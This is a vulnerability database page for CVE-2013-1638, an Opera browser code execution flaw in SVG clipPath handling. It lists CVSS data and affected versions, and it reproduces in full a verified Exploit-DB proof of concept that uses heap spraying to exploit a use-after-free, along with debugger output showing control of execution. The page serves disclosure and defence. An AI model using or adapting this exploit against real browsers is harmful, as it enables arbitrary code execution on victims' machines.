CVE-2013-1638
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 24448
Publication date : 2013-02-04 23h00 +00:00
Author : Cons0ul
EDB Verified : Yes
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w0.org/1999/xlink">
<g id="group">
<defs>
<clipPath id="clip-circle" clip-path="url(#clip-rect)">
</clipPath>
<clipPath id="clip-rect">
</clipPath>
</defs>
<circle id="rect" x="10" y="10" width="100" height="100" fill="green" />
</g>
<script><![CDATA[
//Author=Cons0ul
var b = new Array();
// this is our spray function where spray is allocated on LFH with exact size 0x78
// so 0x78 size of block is created so far we are creating 0x50000 blocks
// to create 0x78 blocks we are using ArrayBuffer();
function feng_shui(){
for(i=0;i<1000;i++)window.opera.collect(); // <----- garbage collection
for(i=0;i<0x50000;i++){
payload = new ArrayBuffer(0x78) // use 0xb0 for 64bit machine
payload[0]=0x6c
payload[1]=0x03
payload[2]=0xfe
payload[3]=0x7f
b.push(payload)
}
}
// bug is use after free in handling of (use tag + clippath) witch try to access freed object
//
document.getElementById('rect').setAttribute('clip-path',"url(#clip-circle)");
var c = document.createElement('use');
c.setAttribute("xlink:href","rect")
feng_shui();
document.getElementById('clip-rect').appendChild(c);
document.getElementById('rect').style.clipPath="url(#clip-circle)" // <----- bug
window.opera.collect() // <------ gc() frees the allocation
feng_shui(); // <------------ we allocate our code at freed memory
// at the end it tries freed block witch contains our data
window.location.href=window.location.href;
/*
idc !heap -p -a ecx
address 077c45e0 found in
_HEAP @ b40000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
077c45d8 0010 0000 [00] 077c45e0 00078 - (free)
PS C:\Users\cons0ul> idc db ecx
077c45e0 92 48 fe 7f 00 00 00 00-00 00 00 00 00 00 00 00 .H..............
077c45f0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4600 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4610 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4620 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4630 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4640 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4650 00 00 00 00 00 00 00 00-89 d0 6a 5b 00 00 00 88 ..........j[....
PS C:\Users\cons0ul> idc r
eax=7ffe4892 ebx=00000001 ecx=077c45e0 edx=00000000 esi=0372e590 edi=01d40048
eip=6b8c998b esp=0013e334 ebp=00000000 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
Opera_6b430000!OpGetNextUninstallFile+0xf8583:
6b8c998b ff5008 call dword ptr [eax+8] ds:0023:7ffe489a=????????
*/
]]></script>
</svg>
Products Mentioned
Configuraton 0
Opera>>Opera_browser >> Version To (including) 12.12
- Opera>>Opera_browser >> Version - (Open CPE detail)
- Opera>>Opera_browser >> Version 1.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 2.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 2.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 2.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 2.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 2.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 2.12 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.21 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.51 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.61 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.62 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.62 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.12 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.1 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.1 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.03 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.04 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.05 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.06 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.12 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.03 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.20 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.20 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.21 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.22 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.23 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.30 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.51 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.53 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.54 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.54 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.54 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.55 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.51 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.53 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.54 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.12 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.20 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.20 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.21 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.22 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.23 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.24 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.25 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.26 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.27 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.51 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.61 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.62 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.63 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.64 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.20 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.51 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.53 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.53 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.53 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.54 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.61 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.62 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.63 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.51 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.52.1100 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.61 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.62 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.64 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.65 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.66 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.67 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.12 (Open CPE detail)
Opera>>Opera_browser >> Version 12.00
- Opera>>Opera_browser >> Version 12.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.00 (Open CPE detail)
Opera>>Opera_browser >> Version 12.00
- Opera>>Opera_browser >> Version 12.00 (Open CPE detail)
Opera>>Opera_browser >> Version 12.01
- Opera>>Opera_browser >> Version 12.01 (Open CPE detail)
Opera>>Opera_browser >> Version 12.02
- Opera>>Opera_browser >> Version 12.02 (Open CPE detail)
Opera>>Opera_browser >> Version 12.10
- Opera>>Opera_browser >> Version 12.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.10 (Open CPE detail)
Opera>>Opera_browser >> Version 12.10
- Opera>>Opera_browser >> Version 12.10 (Open CPE detail)
Opera>>Opera_browser >> Version 12.11
- Opera>>Opera_browser >> Version 12.11 (Open CPE detail)
References
http://lists.opensuse.org/opensuse-updates/2013-02/msg00038.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
2025©
tesweb SA
